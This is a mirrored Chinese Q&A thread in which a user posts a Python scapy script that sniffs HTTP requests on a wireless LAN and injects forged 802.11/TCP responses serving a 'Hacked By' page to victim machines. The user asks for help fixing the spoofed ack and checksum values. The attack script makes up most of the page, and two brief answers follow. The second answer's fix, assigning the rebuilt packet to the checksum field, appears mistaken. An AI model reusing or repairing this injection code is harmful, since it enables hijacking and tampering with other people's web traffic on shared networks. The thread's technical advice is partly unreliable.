1. 首頁
  2. 問答
  3. 使用scapy在無線局域網中創建欺騙HTTP響應

使用scapy在無線局域網中創建欺騙HTTP響應

2014-03-31 45 views
1

我使用python-scapy創建類似airpwn的程序。現在,我可以嗅探它並僞造802.11數據包,具體指定欺騙所需的任何值並將其發送給受害者機器,但它不起作用。我認爲,因爲我在計算惡搞ack號碼方面錯了。請告訴我如何重新計算確認編號或錯過的內容。使用scapy在無線局域網中創建欺騙HTTP響應

#!/usr/bin/env python 

from scapy.all import * 
from scapy.error import Scapy_Exception 
import os 
import HTTP 
##### Start promicuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel) 
tmp=os.popen("iwconfig 2>&1 | grep ESSID | awk '{print $1}' | grep wlan | grep -v mon") 
wlan=tmp.read() 
wlan=wlan.rstrip('\n') 
m_iface="mon0" 
#spoof_response=rdpcap("response.cap") 

def pktTCP(pkt): 
    if pkt.haslayer(TCP): 
     if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt: 
      src=pkt[IP].src 
      srcport=pkt[IP].sport 
      dst=pkt[IP].dst 
      dstport=pkt[IP].dport 
      test=pkt[TCP].payload 
      if (HTTP.HTTPRequest in pkt): 
       print "HTTP Request:" 
       print "======================================================================" 
       print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host) 
       print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack)) 
       print ("Wireless: ",wlan) 

       dot11_frame = RadioTap()/Dot11(
        type = "Data", 
        FCfield = "from-DS", 
        addr1 = pkt[Dot11].addr2, 
        addr2 = pkt[Dot11].addr1, 
        addr3 = pkt[Dot11].addr1, 
        ) 

       #### Spoof HTTP Response 
           day=time.strftime("%a, %d %Y %T GMT+7") 
           #print day 
           spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>" 
       len_of_page=len(spoof_Page) 
       spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a" 
           Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page 


       #### Crafing HTTP Response Packet 
       spoof_response=dot11_frame/LLC(ctrl=3)/SNAP()/IP()/TCP()/Spoof_Payload 
       #### Spoof IP 
       spoof_response.dst=pkt[IP].src 
       spoof_response.src=pkt[IP].dst 
       spoof_response.ttl=pkt[IP].ttl 
       #### Spoof TCP 
       spoof_response.sport=pkt[TCP].dport 
       spoof_response.dport=pkt[TCP].sport 
       spoof_response.window=dport=pkt[TCP].window 
       spoof_response.seq=pkt[TCP].ack 

       ### Recalculate chksum and ack    
       spoof_response.ack=(pkt[TCP].seq + len(Spoof_Payload)) & 0xffffffff 
       del spoof_response.chksum 
       ### For recalculate chksum 
       spoof_response = spoof_response.__class__(str(spoof_response)) 

       print "Finish specific value" 
       #spoof_response.show() 
       sendp(spoof_response) 

print "Start Sniffing" 
sniff(iface=m_iface,prn=pktTCP)

來源

2014-03-31 materaj

回答

0

如果更改有效負載的內容,還應更改MAC聽寫器和TCP標頭中的校驗和。否則,數據包將被視爲錯誤的數據包並自動丟棄。

來源

2014-03-31 18:40:13 Daniel

+0

是的,我知道,我嘗試重新計算校驗和 德爾spoof_response.chksum ###對於重新計算CHKSUM spoof_response = spoof_response .__類__(STR(spoof_response)) – materaj

0

刪除spoof_response.chksum後,我想你重新初始化該變量。

spoof_response.chksum = spoof_response.__class__(str(spoof_response))

來源

2016-12-13 08:26:53 guest

相關問題

 相關問題